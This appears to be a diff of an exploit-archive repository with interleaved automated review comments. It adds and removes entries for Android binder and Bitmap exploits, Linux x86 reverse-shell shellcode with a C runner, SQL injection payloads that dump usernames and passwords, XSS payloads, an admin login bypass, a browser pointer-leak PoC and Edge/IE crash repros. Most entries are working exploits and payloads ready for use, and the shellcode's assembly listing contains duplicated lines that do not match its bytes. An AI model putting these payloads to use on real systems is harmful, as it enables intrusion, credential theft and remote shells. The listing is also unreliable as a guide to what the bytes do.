node_id node = (node_id)data.readInt32();
OMX_U32 port_index = data.readInt32();
OMX_BOOL graphic = (OMX_BOOL)data.readInt32();
OMX_BOOL enable = (OMX_BOOL)data.readInt32();
status_t err = enableNativeBuffers(node, port_index, graphic, enable);
reply->writeInt32(err);
return NO_ERROR;
}
Running the attached proof-of-concept on a Nexus 5x yields the following output:
--- binder OMX index-out-of-bounds ---
[0] opening /dev/binder
[0] looking up media.player
0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .
0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .
0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
0064: 0c . 00 . 00 . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 . 2e . 00 .
0080: 70 p 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1000 data 24 offs 8
0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
- type 73682a85 flags 0000017f ptr 0000000000000001 cookie 0000000000000000
[0] got handle 00000001
[0] creating an OMX
0000: 00 . 01 . 00 . 00 . 21 ! 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 .
0032: 61 a 00 . 2e . 00 . 49 I 00 . 4d M 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 .
0048: 50 P 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 53 S 00 . 65 e 00 .
0064: 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1013 data 24 offs 8
0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 02 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
- type 73682a85 flags 0000017f ptr 0000000000000002 cookie 0000000000000000
[0] got handle 00000002
[0] creating node
0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 .
0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 .
0048: 58 X 00 . 00 . 00 . 4f O 4d M 58 X 2e . 67 g 6f o 6f o 67 g 6c l 65 e 2e . 67 g
0064: 73 s 6d m 2e . 64 d 65 e 63 c 6f o 64 d 65 e 72 r 00 . 00 . 85 . 2a * 62 b 73 s
0080: 7f . 01 . 00 . 00 . 41 A 41 A 41 A 41 A 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
0096: 00 . 00 . 00 . 00 .
BR_NOOP:
BR_INCREFS:
0x7fe5862df8, 0x7fe5862e00
BR_ACQUIRE:
0x7fe5862e0c, 0x7fe5862e14
BR_TRANSACTION_COMPLETE:
BR_NOOP:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1013 data 8 offs 0
0000: 00 . 00 . 00 . 00 . 03 . 00 . 1e . 1d .
[0] got node 1d1e0003
[0] triggering bug
0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 .
0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 .
0048: 58 X 00 . 00 . 00 . 03 . 00 . 1e . 1d . ba . 43 C 46 F 60 ` 00 . 00 . 00 . 00 .
0064: 00 . 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_NOOP:
BR_DEAD_REPLY:
And a corresponding crash in the mediaserver process:
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'google/bullhead/bullhead:7.0/NRD91E/3234993:userdebug/dev-keys'
Revision: 'rev_1.0'
ABI: 'arm'
pid: 7454, tid: 7457, name: Binder:7454_1 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x6a9e0014
r0 6a9dffa8 r1 ea8e757c r2 ea43aa1a r3 0000000f
r4 e984f0c0 r5 8000101a r6 00000000 r7 ea43a981
r8 604643ba r9 00000000 sl ea451f61 fp 00000000
ip ea012658 sp e81d5660 lr e9faa527 pc ea42d834 cpsr 60030030
backtrace:
#00 pc 0001c834 /system/lib/libstagefright_omx.so (_ZN7android15OMXNodeInstance19enableNativeBuffersEj8OMX_BOOLS1_+131)
#01 pc 0009b8fb /system/lib/libmedia.so (_ZN7android5BnOMX10onTransactEjRKNS_6ParcelEPS1_j+3626)
#02 pc 000359c3 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+70)
#03 pc 0003d1bb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+702)
#04 pc 0003ce07 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+114)
#05 pc 0003d31b /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+46)
#06 pc 0004f765 /system/lib/libbinder.so
#07 pc 0000e349 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+140)
#08 pc 00047003 /system/lib/libc.so (_ZL15__pthread_startPv+22)
#09 pc 00019e1d /system/lib/libc.so (__start_thread+6)
Fixed in the November security bulletin at https://source.android.com/security/bulletin/2016-11-01.html
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip
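Review bot: the write-up identifies the missing check (port_index is read straight from the parcel in the ENABLE_NATIVE_BUFFERS handler and used as an index into mSecureBufferType in enableNativeBuffers without a bounds test) but never states which Android releases are affected; the only version information is the build fingerprint buried in the crash dump ('bullhead:7.0/NRD91E'). Add an affected-versions line next to the November 2016 bulletin link so a reader can tell whether their build is covered, and state the remediation explicitly: validate portIndex against the bounds of mSecureBufferType before any write to it.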


@ -0,0 +1,91 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928
Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order to conserve memory, there exists a code path which allows Bitmaps to be shared between processes by providing an ashmem-mapped file descriptor containing the Bitmap's raw pixel data.
The android.graphics.Bitmap class illegally assumes that the size of the ashmem region provided by the user matches the actual underlying size of the Bitmap.
When un-flattening a Bitmap from a Parcel, the class first calculates the assumed size of the Bitmap from the user-provided dimensions. Then, it calls Parcel::readBlob in order to map the given ashmem file descriptor to the process's VAS. This mapping is done using the size calculated from the Bitmap's dimensions (and not the size of the underlying ashmem descriptor).
Later, the Bitmap constructor internally stores the ashmem file descriptor and mapped memory address, along with the size of the mapping. However, instead of using the same calculated size which was used when mapping the shared memory region, it accidentally queries the ashmem region for its real size, like so:
mPixelStorage.ashmem.size = ashmem_get_size_region(fd);
This size can be completely controlled by an attacker (simply by calling ASHMEM_SET_SIZE), and may be arbitrary large.
Later, when the Bitmap is GC-ed, the destructor triggers a call to Bitmap::doFreePixels which unmaps the Bitmap's data, by calling:
munmap(mPixelStorage.ashmem.address, mPixelStorage.ashmem.size);
This means that an attacker can cause the size of the unmapped region to be arbitrarily large, thus unmapping crucial regions in the remote process's VAS.
One example of how this can be exploited is by unmapping the remote process's heap (which is directly after the mmap-ed ranges on the device I was working on). Then, the attacker can resend a large Bitmap which will be mapped over the (previously unmapped) heap, thus allowing the attacker to effectively replace the remote process's heap with controlled data.
I've attached a short PoC which crashes system_server by repeatedly unmaps large memory regions.
Suggested Fix:
Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region.
Here's a brief run-down of the exploit:
1. The exploit begins by calling AudioService.unloadSoundEffects in order to close the SoundPool instance in system_server. This also closes any auxiliary threads (SoundPool, SoundPoolThread, etc.) that are associated with this pool.
2. Now, we start "massaging" system_server's VAS. This is done by creating multiple "Notification" objects which contain Bitmaps that are of exactly the same size at a thread's stack, when created by the ART runtime. As the bitmaps are allocated by using "mmap", they will simply inhabit the highest memory address between mm->mmap_base and TASK_SIZE which contains a sufficiently large contiguous hole. Causing many allocations of the aforementioned size will ensure that any "holes" of this size in higher addresses are filled, and the remaining "mmap"-s of this size will be contiguous.
3. Now that we are certain allocations of size THREAD_SIZE are contiguous, we replace one of notifications created in the previous stage with a notification containing a small (or empty) bitmap, and immediately send multiple dummy transactions to system_server in order to force garbage collection of the freed bitmap object. This will enable us to open up a "hole" in the contiguous allocations, like so:
<--low high-->
----------------------------------------------------------------
| Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap |
----------------------------------------------------------------
||
\/
<--low high-->
----------------------------------------------------------------
| Bitmap | Bitmap ||||hole|||| Bitmap | Bitmap | Bitmap | Bitmap |
----------------------------------------------------------------
4. Now that there's a THREAD_SIZE-sized hole opened up, we can call AudioSystem.loadSoundEffects() in order to re-create the SoundPool object within system_server. This will allocate a new "SoundPoolThread" thread in system_server, which (after brief initialization) enters a polling loop on a condition variable (or rather, a futex), waiting for messages to be enqueued. However, this thread's stack will be directly mmap-ed in our previously created hole, like so:
<--low high-->
---------------------------------------------------------------------------
| Bitmap | Bitmap |SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
---------------------------------------------------------------------------
6. Now, similarly to step 3., we can free the chunk directly before the previously unmapped chunk, creating the following state:
<--low high-->
-----------------------------------------------------------------------------
| Bitmap ||||hole||||SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
-----------------------------------------------------------------------------
6. Finally, we send our "poisoned" bitmap object, which should get allocated directly in front of the SoundPoolThread's stack. Then, we force garbage collection once more, resulting in both the bitmap and the SoundPoolThread's stack being unmapped. However, since the SoundPoolThread is still waiting on a futex, this is fine. Here's what this stage looks like:
<--low high-->
--------------------------------------------------------------------------------
| Bitmap |Poison Bitmap|SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
--------------------------------------------------------------------------------
||
\/
<--low high-->
--------------------------------------------------------------------------------
| Bitmap ||||||||||||||||hole||||||||||||||||| Bitmap | Bitmap | Bitmap | Bitmap |
--------------------------------------------------------------------------------
7. At this point we can enqueue another notification, this time backed by a specially crafted ashmem file, containing two separate pieces of information:
a. A chunk of position independent ARM/ARM64 code, followed by
b. A ROP stack
This notification will be of size THREAD_SIZE*2, and will therefore fill up the hole we just set up, resulting in the following state:
<--low high-->
-------------------------------------------------------------------
| Bitmap | PIC code | ROP Stack | Bitmap | Bitmap | Bitmap | Bitmap |
-------------------------------------------------------------------
8. Now, we can safely call AudioService.unloadSoundEffects() once more. This will signal the condition variable that SoundPoolThread was waiting on, but now when it returns it will be executing our own ROP stack. The ROP stack simply mmap-s the ashmem file descriptor with PROT_EXEC and jumps into it (essentially executing the PIC code we supplied).
Proofs of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip
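Review bot: the step list in this file is misnumbered (it runs 1, 2, 3, 4, 6, 6, 7, 8 with no step 5, and the two entries labelled '6.' are different steps), and the suggested fix ('Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region') is the one line a defender needs yet sits between the description and the exploitation narrative; renumber the steps and move the fix to the top, together with the underlying rule that the size passed to munmap must be the same value that was used for the mapping. Also 'crashes system_server by repeatedly unmaps large memory regions' should read 'by repeatedly unmapping large memory regions'.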


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17941/info
Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/Details.cfm?ProdID=[SQL]
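Review bot: this deletes the Cartweaver ColdFusion advisory (bid 17941), but none of the files.csv hunks shown in this diff remove or re-point a row for it; confirm the index no longer references the deleted path, otherwise the csv will carry a dangling file reference.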


@ -0,0 +1,113 @@
/*
;author: Filippo "zinzloun" Bersani
;date: 05/12/2016
;version: 1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
; Linux bb32 4.4.0-45-generic 32bit
; description:
get a reverse shell executing a shell script saved in tmp that execute netcat that reverse the shell to the listener,
considering that by now the default nc configuration does not permitt to execute (-e) command directly anymore
this is a different approach that permitt to execute not only netcat.
LIMITATION: size of the shellcode; the attacker has to have gained the privilege to execute commmand (/bin/bash)
; see comment for details
global _start
section .text
_start:
CreateFile:
xor eax, eax ;zeroing
xor edx, edx
push eax ;NULL byte as string terminator
push 0x65782e2f ;name of file to be executed /tmp/.xe
push 0x706d742f
mov ebx, esp ;ebx point to pushed string
mov esi, esp ;save the name of the file for a later use
mov al,0x8 ;create the file...
mov cl,077o ;...with 77 permission in octal (to avoid 0)
int 0x80
jmp CallPop
WriteString:
pop ecx ;get the command string to write in the file, 3rd arg
mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg
mov dl,0x09 ;now we put value $0x09 into dl...
inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;)
mov byte [ecx+92],dl ;replace our R char with 0x0A *
xor edx,edx
mov dl,93 ;len of the buffer to write, 4th arg **
mov al,0x04 ;sys call to write the file
int 0x80
mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg
mov dl,0x09 ;now we put value $0x09 into dl...
inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;)
mov byte [ecx+92],dl ;replace our R char with 0x0A *
xor edx,edx
mov dl,93 ;len of the buffer to write, 4th arg **
mov al,0x04 ;sys call to write the file
int 0x80
CloseFile:
xor eax,eax
mov al, 0x6 ;close the stream file
int 0x80
ExecFile:
xor eax, eax
push eax ;push null into the stack
;push ////bin/bash into the stack
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx,esp ;set the 1st arg /bin/bash from the stack
;set up the args array
push eax ; null
push esi ; get the saved pointer to the /tmp/.xe
push ebx ; pointer to /bin/bash
mov ecx, esp ;set the args
xor edx,edx
mov al, 0xb ;sys call 11 to execute the file
int 0x80
CallPop:
call WriteString
;this string can be configured to execute other command too, you have only to adjust the length of the buffer (**) and the index of the char (R) to replace (*)
;according to the length of the string
db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fR"
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xd2\x50\x68\x2f\x2e\x78\x65\x68\x2f\x74\x6d\x70\x89\xe3\x89\xe6\xb0\x08\xb1\x3f\xcd\x80\xeb\x37\x59\x89"
"\xc3\xb2\x09\xfe\xc2\x88\x51\x5c\x31\xd2\xb2\x5d\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68"
"\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xc4\xff\xff\xff\x72\x6d\x20\x2d\x66"
"\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x63\x61\x74\x20\x2f\x74\x6d\x70\x2f"
"\x66\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x32\x3e\x26\x31\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x6e\x63\x20\x20\x6c\x6f"
"\x63\x61\x6c\x68\x6f\x73\x74\x20\x39\x39\x39\x39\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x52";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
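Review bot: the assembly listing in the comment block does not match the byte string beneath it, so the listing cannot be used to audit the bytes. First, the WriteString sequence from 'mov ebx,eax' through 'int 0x80' appears twice in the listing (eight duplicated lines), while the bytes contain it once: after the write's \xcd\x80 the code goes directly to \x31\xc0\xb0\x06\xcd\x80, the close. Second, the bytes carry two spaces between 'nc' and 'localhost' (\x6e\x63\x20\x20\x6c\x6f) whereas the db line has one; with two spaces the string is 93 bytes with 'R' at index 92, which is what makes 'mov byte [ecx+92]' and 'mov dl,93' line up, so the db line should be corrected to match. In the C harness, 'main()' with an implicit int return type is not valid C99 and should be 'int main(void)'. For anyone assessing this sample defensively, the on-disk artefacts are spelled out in the listing and string: a script at /tmp/.xe created with mode 077 and a FIFO at /tmp/f.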


@ -1,4 +1,3 @@
/*
add by SpeeDr00t@Blackfalcon (jang kyoung chip)


@ -1,28 +0,0 @@
==================================================================
# Exploit Title: AlstraSoft AskMe Pro SQL Injection Vulnerability
# Date: 12/09/2010
# Author: Amine_92
# Email: amine92_16@hotmail.fr
# Software Link: http://www.alstrasoft.com/askme.htm
# Version: All Version
# Price: 99.99$
# Tested on: Xp Sp 2
# Home: Dark Zone Organization (www.v9b.org/vb)
==================================================================
SQL injection in AlstraSoft AskMe Pro
Affected items:
http://www.Victime.com/forum_answer.php?que_id=[SQL]
Example:
-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
Demo URL:
http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
==================================================================
Good Luck
Tank's To : All Memeber Of Dark Zone & Administrator Emptyzero
Don't Forget Our Brother In Gaza & Palestine


@ -47,7 +47,7 @@ function xpath(){document.forms["xml"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xml">
<input type="hidden" name="message" value="\\';--\\&#34;;--" /></form>
<input type="hidden" name="message" value="\\';--\\";--" /></form>
<a href="javascript: xml();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XML Injection!<h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
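Review bot: replacing '&#34;' with a literal '"' inside the double-quoted value attribute changes the markup's meaning: the quote now terminates the attribute after '\\';--\\' and leaves ';--"' stranded as malformed attribute text, so the form no longer submits the same message value as the previous revision. The entity form was the correct way to carry a double quote inside that attribute and should be retained.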


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/14499/info
Gravity Board X (GBX) is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/deletethread.php?board_id="><script>alert(document.cookie)</script>


@ -1,15 +0,0 @@
source: http://www.securityfocus.com/bid/57948/info
AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AbanteCart 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E

platforms/php/webapps/40877.txt Executable file

@ -0,0 +1,27 @@
# Exploit Title: AbanteCart 1.2.7 Stored XSS
# Date: 06-12-2016
# Software Link: http://www.abantecart.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
By default all user input is escaped using `htmlspecialchars`.
But we can pass `__e` value which is base64 encoded and unfortunatelly those datas are not cleaned.
http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html
2. Proof of Concept
For example `address_1="><script>alert(2);</script>&` can be encoded as: `__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m`.
So create new order and set `address_1` value as `__e` using for example Burp:
```
Content-Disposition: form-data; name="__e"
YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m
```
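Review bot: the description names the root cause (the base64-encoded '__e' parameter is decoded and used without the 'htmlspecialchars' escaping that is applied to direct input) but the header has no 'Tested on' or fixed-version line and references no vendor fix; add whichever of those the linked write-up provides. The remediation follows directly from the description and is worth stating: apply the same escaping to the fields decoded from '__e' as to ordinary input, or refuse '__e' for fields that are later rendered.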

platforms/php/webapps/40882.txt Executable file

@ -0,0 +1,44 @@
# Exploit Title: Edge SkateShop Authentication Bypass
# Date: 6/12/2016
# Exploit Author: Delilah
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip
# Tested on: xampp
go to http://localhost/EdgeSketch/adminlogin.php
username = admin' #
password = anything
# Proof of Concept:
POST /EdgeSketch/adminlogin.php HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.0.2.15/EdgeSketch/
Cookie: PHPSESSID=5n96kq5kd17joptp1sivhm4tl4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
admin_username=admin'%20#&admin_password=fdgdhf&admin_login=
HTTP/1.1 200 OK
Date: Tue, 06 Dec 2016 16:10:00 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
X-Powered-By: PHP/5.6.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 107
Connection: close
Content-Type: text/html; charset=UTF-8
<script>alert('You're successfully login!')</script><script>window.open('Admin/index.php','_self')</script>
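Review bot: the PoC shows the bypass is a SQL comment sequence injected through the username field (admin' #, URL-encoded as admin'%20# in the POST body), so the title and the csv description should say SQL injection rather than only 'Authentication Bypass'; the header also gives no software version, only 'Tested on: xampp'. The fix implied by the request is a parameterised query (prepared statement) for the adminlogin.php credential check. Separately, the application's own success response embeds "You're" inside a single-quoted JavaScript string, which is a syntax error in the page being returned and worth noting for anyone reproducing the behaviour.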


@ -0,0 +1,64 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=952
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.
A minimal PoC is as follows:
var once = false;
var a = 1;
function f(){
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
return {};
}
JSON.parse("[1, 2, [4, 5]]", f);
A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.
-->
<html>
<body>
<script>
var once = false;
var a = 1;
function f(){
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
//alert("f " + this);
return {};
}
JSON.parse("[1, 2, [4, 5]]", f);
var n = new Number(a[0]);
n = n >> 1;
var s = n.toString(16);
n = new Number(a[1]);
n = n >> 1;
s = s + n.toString(16);
n.length = 100;
n = new Number(a[2]);
n = n >> 1;
s = s + " " + n.toString(16);
n = new Number(a[3]);
n = n >> 1;
s = s + n.toString(16);
alert(s);
</script>
</body>
</html>
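Review bot: the explanatory comment says the PoC 'will delay pointers in an alert dialog'; that should read 'display'. In the script, 'n.length = 100' assigns a property on a Number wrapper and has no effect on the lines that follow, so it reads like a leftover from an earlier version and should be removed or explained. The root-cause sentence in the comment (Walk assumes the array the reviver placed in the output is a Var array and writes pointers into it) is the useful part for defenders: the fix is to check the array's actual type before writing into it.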

platforms/windows/dos/40878.txt Executable file

@ -0,0 +1,32 @@
Source: http://blog.skylined.nl/20161201001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Edge 11.0.10240.16384
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path.
Repro:
/<style>:first-letter{word-spacing:9
Variation:
x<style>:first-letter{background-position:inherit
Description
At the time this issue was first discovered, Mem­GC was just introduced, and I had not yet fully appreciated what an impact it would have on mitigating use-after-free bugs. Despite Mem­GC being enabled in Microsoft Edge by default, this issue appeared to me to have been a use-after-free vulnerability. However, both Microsoft and ZDI (whom I sold the vulnerability to) describes it as a memory corruption vulnerability, so it's probably more complex than I assumed.
At the time, I did not consider this vulnerability to be of great interest, as there was no immediately obvious way of controlling the vulnerability in order to exploit it. So, I did not do any further investigation into the root cause and, if this was indeed a use-after-free, how come Mem­GC did not mitigate it? In hindsight, it would have been a good idea to investigate the root cause, as any use-after-free that is not mitigated by Mem­GC might provide hints on how to find more vulnerabilities that bypass it.
Time-line
August 2015: This vulnerability was found through fuzzing.
August 2015: This vulnerability was submitted to ZDI.
December 2015: Microsoft addresses this vulnerability in MS15-125.
December 2016: Details of this vulnerability are released.


@ -0,0 +1,42 @@
<!--
Source: http://blog.skylined.nl/20161202001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<iframe style="border:1px solid red;width:100%;height:100%;" name="iframe"></iframe>
<script>
window.open("Repro.xml", "iframe");
set­Timeout(function () {
window.open('javascript:void(location.href = "about:blank");', "iframe");
}, 1000);
</script>
<!--
Repro.xml:
<!DOCTYPE x PUBLIC "" "http://www.w3.org/TRt.dtd">
Description
This is the first security vulnerability I sold to ZDI after I quit my job at Google to live off security bug bounties. It appears I either did not analyze this issue (probably), or misplaced my analysis (probably not), as I cannot find any details in my archives, other than a repro and a HTML bug report (provided below) created by a predecessor to Bug­Id. From the information provided by ZDI in their advisory, and Microsoft in their bulletin, as well as the bug report, it seems to have been a use-after-free vulnerability. Unfortunately, that is all the analysis I can provide.
Time-line
June 2012: This vulnerability was found through fuzzing.
June 2012: This vulnerability was submitted to ZDI.
July 2012: This vulnerability was acquired by ZDI.
September 2012: This vulnerability was disclosed to Microsoft by ZDI.
February 2013: Microsoft addresses this vulnerability in MS13-009.
December 2016: Details of this vulnerability are released.
-->
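Review bot: the script in Repro.html will not run as committed: `set­Timeout(function () {` contains a soft-hyphen (U+00AD) inside the identifier, copied from the blog's wrapping markup, and the same character splits `Java­Script` and `Bug­Id` in the comment text; strip U+00AD from the whole file. The Repro.xml content is also only quoted inside the trailing HTML comment, so the header comment should state that the DOCTYPE line must be saved as a separate Repro.xml beside Repro.html for `window.open("Repro.xml", "iframe")` to load anything.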

platforms/windows/dos/40880.txt Executable file

@ -0,0 +1,75 @@
Source: http://blog.skylined.nl/20161205001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Edge
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path.
Discovery
This issue was found through fuzzing in the 64-bit version of Microsoft Edge, in which the original repro triggered what appeared to be a NULL pointer dereference in CBase­Scriptable::Private­Query­Interface. So, after a very brief look at the repro, I filed a bug in the public bug tracker and published it on twitter. The original repro was:
<body onload=typeof(open().crypto)>
